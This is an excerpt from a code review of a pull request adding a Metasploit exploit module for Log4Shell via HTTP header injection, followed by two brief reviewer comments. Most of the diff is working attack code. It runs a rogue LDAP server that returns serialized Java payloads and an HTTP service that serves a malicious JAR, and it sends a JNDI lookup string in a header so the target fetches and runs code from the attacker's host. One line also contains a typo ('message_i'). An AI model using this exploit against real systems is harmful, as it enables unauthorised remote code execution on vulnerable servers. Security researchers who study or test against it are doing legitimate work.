modules/exploits/multi/http/log4shell_header_injection.rb

```diff
@@ -0,0 +1,314 @@
+        [ 'javaSerializedData'.to_ber, [ java_payload.to_ber ].to_ber_set ].to_ber_sequence
+      ]
+    end
+    appseq = [
+      base_dn.to_ber,
+      attrs.to_ber_sequence
+    ].to_ber_appsequence(Net::LDAP::PDU::SearchReturnedData)
+    [ msg_id.to_ber, appseq ].to_ber_sequence
+  end
+
+  ## LDAP service callbacks
+  #
+  # Handle incoming requests via service mixin
+  #
+  def on_dispatch_request(client, data)
+    return if data.strip.empty?
+
+    data.extend(Net::BER::Extensions::String)
+    begin
+      pdu = Net::LDAP::PDU.new(data.read_ber!(Net::LDAP::AsnSyntax))
+      vprint_status("LDAP request data remaining: #{data}") unless data.empty?
+      resp = case pdu.app_tag
+             when Net::LDAP::PDU::BindRequest # bind request
+               client.authenticated = true
+               service.encode_ldap_response(
+                 pdu.message_id,
+                 Net::LDAP::ResultCodeSuccess,
+                 '',
+                 '',
+                 Net::LDAP::PDU::BindResult
+               )
+             when Net::LDAP::PDU::SearchRequest # search request
+               if client.authenticated || datastore['LDAP_AUTH_BYPASS']
+                 client.write(serialized_payload(pdu.message_id, pdu.search_parameters[:base_object]))
+                 service.encode_ldap_response(pdu.message_id, Net::LDAP::ResultCodeSuccess, '', 'Search success', Net::LDAP::PDU::SearchResult)
+               else
+                 service.encode_ldap_response(pdu.message_i, 50, '', 'Not authenticated', Net::LDAP::PDU::SearchResult)
+               end
+             else
+               vprint_status("Client sent unexpected request #{pdu.app_tag}")
+               client.close
+             end
+      resp.nil? ? client.close : on_send_response(client, resp)
+    rescue StandardError => e
+      print_error("Failed to handle LDAP request due to #{e}")
+      client.close
+    end
+    resp
+  end
+
+  ## HTTP service callbacks
+  #
+  # Handle HTTP requets and responses
+  #
+  def on_request_uri(cli, request)
+    agent = request.headers['User-Agent']
+    vprint_good("Payload requested by #{cli.peerhost} using #{agent}")
+    pay = regenerate_payload(cli)
+    jar = inject_jar_payload_factory(pay.encoded_jar)
+    send_response(cli, 200, 'OK', jar)
+  end
+
+  #
+  # Create an HTTP response and then send it
+  #
+  def send_response(cli, code, message = 'OK', html = '')
+    proto = Rex::Proto::Http::DefaultProtocol
+    res = Rex::Proto::Http::Response.new(code, message, proto)
+    res['Content-Type'] = 'application/java-archive'
+    res.body = html
+    cli.send_response(res)
+  end
+
+  def exploit
+    # LDAP service
+    start_service
+    # HTTP service
+    start_http_service if datastore['REMOTE_LOAD']
+    # HTTP request initiator
+    send_request_raw(
+      'uri' => normalize_uri(target_uri),
+      'method' => datastore['HTTP_METHOD'],
+      'headers' => { datastore['HTTP_HEADER'] => jndi_string }
+    )
+    handler
```

Comment:
After having updated this to use the aggressive stance, I think this is where we'd want to add a timeout.

Reply:
I usually disable the exploit handler and run them in the background myself on magic ports determined by the workspace name (i swear i will buy Pro one day) - so definitely defer on all of those semantic issues to your expertise.